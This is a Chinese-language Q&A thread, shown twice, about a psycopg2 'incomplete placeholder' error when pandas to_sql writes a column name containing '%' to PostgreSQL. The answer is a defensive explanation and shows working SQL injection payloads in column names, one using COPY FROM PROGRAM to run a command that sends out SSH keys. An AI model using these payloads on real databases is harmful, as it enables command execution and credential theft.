psycopg2.ProgrammingError: incomplete placeholder: '%(' without ')'
psycopg2.ProgrammingError: incomplete placeholder: '%(' without ')'
我有几个不同的函数,可以用 pandas 抓取不同的 table,将每个函数保存到数据框,然后将它们保存到 PostgreSQL 数据库。我能够成功地抓取每个 table 并将其保存为数据框,但是在将其保存到 SQL 时我遇到了一些问题。我正在尝试使用以下内容来执行此操作:
from sqlalchemy import create_engine
# Opening sql connection
engine = create_engine('postgresql://postgres:pw@localhost/name')
con = engine.connect()
def df1():
df = scraped_data
df.to_sql(table_name, con, if_exists='replace')
df1()
def df2():
df = scraped_data
df.to_sql(table_name, con, if_exists='replace')
df2()
# Closing connection
con.close()
我能够成功地将 df1
保存到 SQL,但是当 运行 df2
时我得到一个错误。
这两个函数之间唯一真正的区别是它们从不同的来源抓取数据。其他一切基本相同。
我还有其他几个用于其他数据帧的函数,但无论我调用这些函数的顺序如何,只有第一个起作用。
对于我调用的所有其他函数,我不断收到相同的错误:
psycopg2.ProgrammingError: incomplete placeholder: '%(' without ')'
他们还链接了错误背景页面:http://sqlalche.me/e/f405),尽管我仍然不太清楚该怎么做。
我只是觉得很奇怪,当唯一改变的是我从中抓取的 url 时,它如何适用于一个功能而不适用于其他功能。
编辑
我正在从 NFL 的网站上抓取数据。
迭代 table 中的年份
中提取数据
看起来主要区别在于 df1
使用 Pct
表示列 header 中的百分比,而 df2
使用 %
TL;DR: 你有一个潜在的SQL注入孔。
问题是您的其中一个列名称包含 %
。这是一个最小的可重现示例:
In [8]: df = pd.DataFrame({"%A": ['x', 'y', 'z']})
In [9]: df.to_sql('foo', engine, if_exists='replace')
产生以下日志和回溯:
...
INFO:sqlalchemy.engine.base.Engine:
DROP TABLE foo
INFO:sqlalchemy.engine.base.Engine:{}
INFO:sqlalchemy.engine.base.Engine:COMMIT
INFO:sqlalchemy.engine.base.Engine:
CREATE TABLE foo (
index BIGINT,
"%%A" TEXT
)
INFO:sqlalchemy.engine.base.Engine:{}
INFO:sqlalchemy.engine.base.Engine:COMMIT
INFO:sqlalchemy.engine.base.Engine:BEGIN (implicit)
INFO:sqlalchemy.engine.base.Engine:INSERT INTO foo (index, "%%A") VALUES (%(index)s, %(%A)s)
INFO:sqlalchemy.engine.base.Engine:({'index': 0, '%A': 'x'}, {'index': 1, '%A': 'y'}, {'index': 2, '%A': 'z'})
INFO:sqlalchemy.engine.base.Engine:ROLLBACK
---------------------------------------------------------------------------
ProgrammingError Traceback (most recent call last)
~/Work/sqlalchemy/lib/sqlalchemy/engine/base.py in _execute_context(self, dialect, constructor, statement, parameters, *args)
1239 self.dialect.do_executemany(
-> 1240 cursor, statement, parameters, context
1241 )
~/Work/sqlalchemy/lib/sqlalchemy/dialects/postgresql/psycopg2.py in do_executemany(self, cursor, statement, parameters, context)
854 if self.executemany_mode is EXECUTEMANY_DEFAULT:
--> 855 cursor.executemany(statement, parameters)
856 return
ProgrammingError: incomplete placeholder: '%(' without ')'
The above exception was the direct cause of the following exception:
ProgrammingError Traceback (most recent call last)
<ipython-input-9-88cf8a93ad8c> in <module>()
----> 1 df.to_sql('foo', engine, if_exists='replace')
...
ProgrammingError: (psycopg2.ProgrammingError) incomplete placeholder: '%(' without ')'
[SQL: INSERT INTO foo (index, "%%A") VALUES (%(index)s, %(%A)s)]
[parameters: ({'index': 0, '%A': 'x'}, {'index': 1, '%A': 'y'}, {'index': 2, '%A': 'z'})]
(Background on this error at: http://sqlalche.me/e/f405)
可以看出SQLAlchemy/Pandas使用列名作为占位键:%(%A)s
。 这意味着您可能对 SQL 注入持开放态度,尤其是因为您正在处理抓取的数据:
In [3]: df = pd.DataFrame({"A": [1, 2, 3], """A)s);
...: DO $$
...: BEGIN
...: RAISE 'HELLO, BOBBY!';
...: END;$$ --""": ['x', 'y', 'z']})
In [4]: df.to_sql('foo', engine, if_exists='replace')
结果:
...
INFO sqlalchemy.engine.base.Engine INSERT INTO foo (index, "A", "A)s);
DO $$
BEGIN
RAISE 'HELLO, BOBBY!';
END;$$ --") VALUES (%(index)s, %(A)s, %(A)s);
DO $$
BEGIN
RAISE 'HELLO, BOBBY!';
END;$$ --)s)
INFO sqlalchemy.engine.base.Engine ({'index': 0, 'A': 1, "A)s);\nDO $$\nBEGIN\nRAISE 'HELLO, BOBBY!';\nEND;$$ --": 'x'}, {'index': 1, 'A': 2, "A)s);\nDO $$\nBEGIN\nRAISE 'HELLO, BOBBY!';\nEND;$$ --": 'y'}, {'index': 2, 'A': 3, "A)s);\nDO $$\nBEGIN\nRAISE 'HELLO, BOBBY!';\nEND;$$ --": 'z'})
INFO sqlalchemy.engine.base.Engine ROLLBACK
---------------------------------------------------------------------------
RaiseException Traceback (most recent call last)
...
InternalError: (psycopg2.errors.RaiseException) HELLO, BOBBY!
CONTEXT: PL/pgSQL function inline_code_block line 3 at RAISE
[SQL: INSERT INTO foo (index, "A", "A)s);
DO $$
BEGIN
RAISE 'HELLO, BOBBY!';
END;$$ --") VALUES (%(index)s, %(A)s, %(A)s);
DO $$
BEGIN
RAISE 'HELLO, BOBBY!';
END;$$ --)s)]
[parameters: ({'index': 0, 'A': 1, "A)s);\nDO $$\nBEGIN\nRAISE 'HELLO, BOBBY!';\nEND;$$ --": 'x'}, {'index': 1, 'A': 2, "A)s);\nDO $$\nBEGIN\nRAISE 'HELLO, BOBBY!';\nEND;$$ --": 'y'}, {'index': 2, 'A': 3, "A)s);\nDO $$\nBEGIN\nRAISE 'HELLO, BOBBY!';\nEND;$$ --": 'z'})]
(Background on this error at: http://sqlalche.me/e/2j85)
如果您使用的是具有足够权限的数据库用户,这允许例如在您的计算机上执行任意命令:
In [11]: df = pd.DataFrame({"A": [1, 2, 3], """A)s);
...: CREATE TEMPORARY TABLE IF NOT EXISTS evil (state text);
...: DO $$
...: BEGIN
...: IF NOT EXISTS (SELECT * FROM evil) THEN
...: COPY evil (state) FROM PROGRAM 'send_ssh_keys | echo done';
...: END IF;
...: END;$$ --""": ['x', 'y', 'z']})
这似乎是对 SQLAlchemy (and/or Pandas') 部分的疏忽,但通常您并不打算允许用户或外部数据定义您的架构,因此 table 和列名称是 "trusted"。 鉴于此,唯一正确的解决方案是将列列入白名单,即对照已知集检查您的数据框是否只有允许的列。
我有几个不同的函数,可以用 pandas 抓取不同的 table,将每个函数保存到数据框,然后将它们保存到 PostgreSQL 数据库。我能够成功地抓取每个 table 并将其保存为数据框,但是在将其保存到 SQL 时我遇到了一些问题。我正在尝试使用以下内容来执行此操作:
from sqlalchemy import create_engine
# Opening sql connection
engine = create_engine('postgresql://postgres:pw@localhost/name')
con = engine.connect()
def df1():
df = scraped_data
df.to_sql(table_name, con, if_exists='replace')
df1()
def df2():
df = scraped_data
df.to_sql(table_name, con, if_exists='replace')
df2()
# Closing connection
con.close()
我能够成功地将 df1
保存到 SQL,但是当 运行 df2
时我得到一个错误。
这两个函数之间唯一真正的区别是它们从不同的来源抓取数据。其他一切基本相同。
我还有其他几个用于其他数据帧的函数,但无论我调用这些函数的顺序如何,只有第一个起作用。
对于我调用的所有其他函数,我不断收到相同的错误:
psycopg2.ProgrammingError: incomplete placeholder: '%(' without ')'
他们还链接了错误背景页面:http://sqlalche.me/e/f405),尽管我仍然不太清楚该怎么做。
我只是觉得很奇怪,当唯一改变的是我从中抓取的 url 时,它如何适用于一个功能而不适用于其他功能。
编辑
我正在从 NFL 的网站上抓取数据。
迭代 table 中的年份 中提取数据看起来主要区别在于 df1
使用 Pct
表示列 header 中的百分比,而 df2
使用 %
TL;DR: 你有一个潜在的SQL注入孔。
问题是您的其中一个列名称包含 %
。这是一个最小的可重现示例:
In [8]: df = pd.DataFrame({"%A": ['x', 'y', 'z']})
In [9]: df.to_sql('foo', engine, if_exists='replace')
产生以下日志和回溯:
...
INFO:sqlalchemy.engine.base.Engine:
DROP TABLE foo
INFO:sqlalchemy.engine.base.Engine:{}
INFO:sqlalchemy.engine.base.Engine:COMMIT
INFO:sqlalchemy.engine.base.Engine:
CREATE TABLE foo (
index BIGINT,
"%%A" TEXT
)
INFO:sqlalchemy.engine.base.Engine:{}
INFO:sqlalchemy.engine.base.Engine:COMMIT
INFO:sqlalchemy.engine.base.Engine:BEGIN (implicit)
INFO:sqlalchemy.engine.base.Engine:INSERT INTO foo (index, "%%A") VALUES (%(index)s, %(%A)s)
INFO:sqlalchemy.engine.base.Engine:({'index': 0, '%A': 'x'}, {'index': 1, '%A': 'y'}, {'index': 2, '%A': 'z'})
INFO:sqlalchemy.engine.base.Engine:ROLLBACK
---------------------------------------------------------------------------
ProgrammingError Traceback (most recent call last)
~/Work/sqlalchemy/lib/sqlalchemy/engine/base.py in _execute_context(self, dialect, constructor, statement, parameters, *args)
1239 self.dialect.do_executemany(
-> 1240 cursor, statement, parameters, context
1241 )
~/Work/sqlalchemy/lib/sqlalchemy/dialects/postgresql/psycopg2.py in do_executemany(self, cursor, statement, parameters, context)
854 if self.executemany_mode is EXECUTEMANY_DEFAULT:
--> 855 cursor.executemany(statement, parameters)
856 return
ProgrammingError: incomplete placeholder: '%(' without ')'
The above exception was the direct cause of the following exception:
ProgrammingError Traceback (most recent call last)
<ipython-input-9-88cf8a93ad8c> in <module>()
----> 1 df.to_sql('foo', engine, if_exists='replace')
...
ProgrammingError: (psycopg2.ProgrammingError) incomplete placeholder: '%(' without ')'
[SQL: INSERT INTO foo (index, "%%A") VALUES (%(index)s, %(%A)s)]
[parameters: ({'index': 0, '%A': 'x'}, {'index': 1, '%A': 'y'}, {'index': 2, '%A': 'z'})]
(Background on this error at: http://sqlalche.me/e/f405)
可以看出SQLAlchemy/Pandas使用列名作为占位键:%(%A)s
。 这意味着您可能对 SQL 注入持开放态度,尤其是因为您正在处理抓取的数据:
In [3]: df = pd.DataFrame({"A": [1, 2, 3], """A)s);
...: DO $$
...: BEGIN
...: RAISE 'HELLO, BOBBY!';
...: END;$$ --""": ['x', 'y', 'z']})
In [4]: df.to_sql('foo', engine, if_exists='replace')
结果:
...
INFO sqlalchemy.engine.base.Engine INSERT INTO foo (index, "A", "A)s);
DO $$
BEGIN
RAISE 'HELLO, BOBBY!';
END;$$ --") VALUES (%(index)s, %(A)s, %(A)s);
DO $$
BEGIN
RAISE 'HELLO, BOBBY!';
END;$$ --)s)
INFO sqlalchemy.engine.base.Engine ({'index': 0, 'A': 1, "A)s);\nDO $$\nBEGIN\nRAISE 'HELLO, BOBBY!';\nEND;$$ --": 'x'}, {'index': 1, 'A': 2, "A)s);\nDO $$\nBEGIN\nRAISE 'HELLO, BOBBY!';\nEND;$$ --": 'y'}, {'index': 2, 'A': 3, "A)s);\nDO $$\nBEGIN\nRAISE 'HELLO, BOBBY!';\nEND;$$ --": 'z'})
INFO sqlalchemy.engine.base.Engine ROLLBACK
---------------------------------------------------------------------------
RaiseException Traceback (most recent call last)
...
InternalError: (psycopg2.errors.RaiseException) HELLO, BOBBY!
CONTEXT: PL/pgSQL function inline_code_block line 3 at RAISE
[SQL: INSERT INTO foo (index, "A", "A)s);
DO $$
BEGIN
RAISE 'HELLO, BOBBY!';
END;$$ --") VALUES (%(index)s, %(A)s, %(A)s);
DO $$
BEGIN
RAISE 'HELLO, BOBBY!';
END;$$ --)s)]
[parameters: ({'index': 0, 'A': 1, "A)s);\nDO $$\nBEGIN\nRAISE 'HELLO, BOBBY!';\nEND;$$ --": 'x'}, {'index': 1, 'A': 2, "A)s);\nDO $$\nBEGIN\nRAISE 'HELLO, BOBBY!';\nEND;$$ --": 'y'}, {'index': 2, 'A': 3, "A)s);\nDO $$\nBEGIN\nRAISE 'HELLO, BOBBY!';\nEND;$$ --": 'z'})]
(Background on this error at: http://sqlalche.me/e/2j85)
如果您使用的是具有足够权限的数据库用户,这允许例如在您的计算机上执行任意命令:
In [11]: df = pd.DataFrame({"A": [1, 2, 3], """A)s);
...: CREATE TEMPORARY TABLE IF NOT EXISTS evil (state text);
...: DO $$
...: BEGIN
...: IF NOT EXISTS (SELECT * FROM evil) THEN
...: COPY evil (state) FROM PROGRAM 'send_ssh_keys | echo done';
...: END IF;
...: END;$$ --""": ['x', 'y', 'z']})
这似乎是对 SQLAlchemy (and/or Pandas') 部分的疏忽,但通常您并不打算允许用户或外部数据定义您的架构,因此 table 和列名称是 "trusted"。 鉴于此,唯一正确的解决方案是将列列入白名单,即对照已知集检查您的数据框是否只有允许的列。